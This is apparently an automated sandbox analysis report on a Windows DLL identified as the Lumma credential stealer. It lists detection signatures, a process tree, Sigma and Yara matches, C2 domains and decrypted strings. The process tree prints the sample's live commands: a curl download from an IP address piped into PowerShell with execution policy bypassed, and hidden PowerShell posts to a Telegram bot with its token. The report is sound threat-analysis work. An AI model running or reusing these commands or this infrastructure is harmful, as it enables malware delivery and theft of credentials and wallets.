Windows Analysis Report
iviewers.dll

Overview

General Information

Sample name: iviewers.dll
Analysis ID: 1581496
MD5: 690a4c9693ad790d6ee23492fe8bf869
SHA1: da39c94f65a34f2f2a72c6b2799f7d991a8c38d8
SHA256: 320db923b7c701a6005e465a082ad48c2f3c8f36145ece15b4980a44202383fe
Tags: dll, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected Powershell download and execute
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Installs new ROOT certificates
LummaC encrypted strings found
Machine Learning detection for dropped file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Unusual Parent Process For Cmd.EXE
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6752 cmdline: loaddll32.exe "C:\Users\user\Desktop\iviewers.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2448 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 4600 cmdline: rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • cmd.exe (PID: 1700 cmdline: C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 3752 cmdline: powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7612 cmdline: C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command - MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7808 cmdline: cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • curl.exe (PID: 7888 cmdline: curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
          • powershell.exe (PID: 7824 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • csc.exe (PID: 7300 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
              • cvtres.exe (PID: 7336 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF463.tmp" "c:\Users\user\AppData\Local\Temp\1yj35v5c\CSC1D664DFBC1CF4D3B97F036955FDEE5EE.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
            • RegAsm.exe (PID: 7548 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • regsvr32.exe (PID: 4324 cmdline: regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • cmd.exe (PID: 1436 cmdline: C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5300 cmdline: powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 7668 cmdline: C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command - MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7868 cmdline: cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • curl.exe (PID: 7956 cmdline: curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • powershell.exe (PID: 7880 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • csc.exe (PID: 5288 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
            • cvtres.exe (PID: 7184 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF461.tmp" "c:\Users\user\AppData\Local\Temp\wzlesmvi\CSC11B817DA9D55460CBF45133E7BAA649F.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
          • RegAsm.exe (PID: 7552 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • rundll32.exe (PID: 1076 cmdline: rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer MD5: 889B99C52A60DD49227C5E485A016679)
      • cmd.exe (PID: 1772 cmdline: C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6512 cmdline: powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 7620 cmdline: C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command - MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7740 cmdline: cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • curl.exe (PID: 7780 cmdline: curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
        • powershell.exe (PID: 7760 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • csc.exe (PID: 6620 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
            • cvtres.exe (PID: 7436 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF462.tmp" "c:\Users\user\AppData\Local\Temp\xyq5akbp\CSC3C74FAAA7254A90B38FFB13CA21DCB4.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
          • RegAsm.exe (PID: 6424 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • cmd.exe (PID: 7460 cmdline: C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • powershell.exe (PID: 7476 cmdline: powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 7424 cmdline: C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command - MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 7228 cmdline: cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • curl.exe (PID: 6656 cmdline: curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • powershell.exe (PID: 6588 cmdline: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 6024 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 2044 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES374.tmp" "c:\Users\user\AppData\Local\Temp\3vvszjlk\CSC1C049BEBEBAF4B45B9D79F1CA1976831.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • RegAsm.exe (PID: 3716 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 2196 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["tentabatte.lat", "slipperyloo.lat", "wordyfindy.lat", "shapestickyr.lat", "bashfulacid.lat", "manyrestro.lat", "curverpluch.lat", "talkynicer.lat", "fivenaii.click"], "Build id": "VC6Dfm--TestOtctuk"}
Source: sslproxydump.pcap, Rule: JoeSecurity_LummaCStealer_3, Description: Yara detected LummaC Stealer, Author: Joe Security
Source: sslproxydump.pcap, Rule: JoeSecurity_LummaCStealer_2, Description: Yara detected LummaC Stealer, Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 7760, Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 7760, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7824, Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 7824, Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 7824, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen

            System Summary

Source: Process started, Author: frack113: Data: Command: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -, CommandLine: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7620, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -, ProcessId: 7760, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7760, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline", ProcessId: 6620, ProcessName: csc.exe
Source: Process started, Author: Tim Rauch: Data: Command: C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}", CommandLine: C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 4324, ParentProcessName: regsvr32.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}", ProcessId: 1436, ProcessName: cmd.exe
Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}", CommandLine: C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 4324, ParentProcessName: regsvr32.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}", ProcessId: 1436, ProcessName: cmd.exe
Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7760, TargetFilename: C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}", CommandLine: powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1436, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}", ProcessId: 5300, ProcessName: powershell.exe

            Data Obfuscation

Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7760, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline", ProcessId: 6620, ProcessName: csc.exe

            AV Detection

            Source: C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.dll, Avira: detection malicious, Label: HEUR/AGEN.1300034
            Source: C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.dll, Avira: detection malicious, Label: HEUR/AGEN.1300034
            Source: C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.dll, Avira: detection malicious, Label: HEUR/AGEN.1300034
            Source: C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.dll, Avira: detection malicious, Label: HEUR/AGEN.1300034
            Source: 45.2.RegAsm.exe.400000.0.unpack, Malware Configuration Extractor: LummaC {"C2 url": ["tentabatte.lat", "slipperyloo.lat", "wordyfindy.lat", "shapestickyr.lat", "bashfulacid.lat", "manyrestro.lat", "curverpluch.lat", "talkynicer.lat", "fivenaii.click"], "Build id": "VC6Dfm--TestOtctuk"}
            Source: iviewers.dll, ReversingLabs: Detection: 47%
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.dll, Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.dll, Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.dll, Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.dll, Joe Sandbox ML: detected
            Source: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: lid=%s&j=%s&ver=4.0
            Source: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: TeslaBrowser/5.5
            Source: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: - Screen Resoluton:
            Source: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: - Physical Installed Memory:
            Source: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: Workgroup: -
            Source: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, String decryptor: VC6Dfm--TestOtctuk
            Source: iviewers.dll, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
            Source: iviewers.dll, Static PE information: DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.pdb source: powershell.exe, 0000001D.00000002.1831061949.0000000005814000.00000004.00000800.00020000.00000000.sdmp
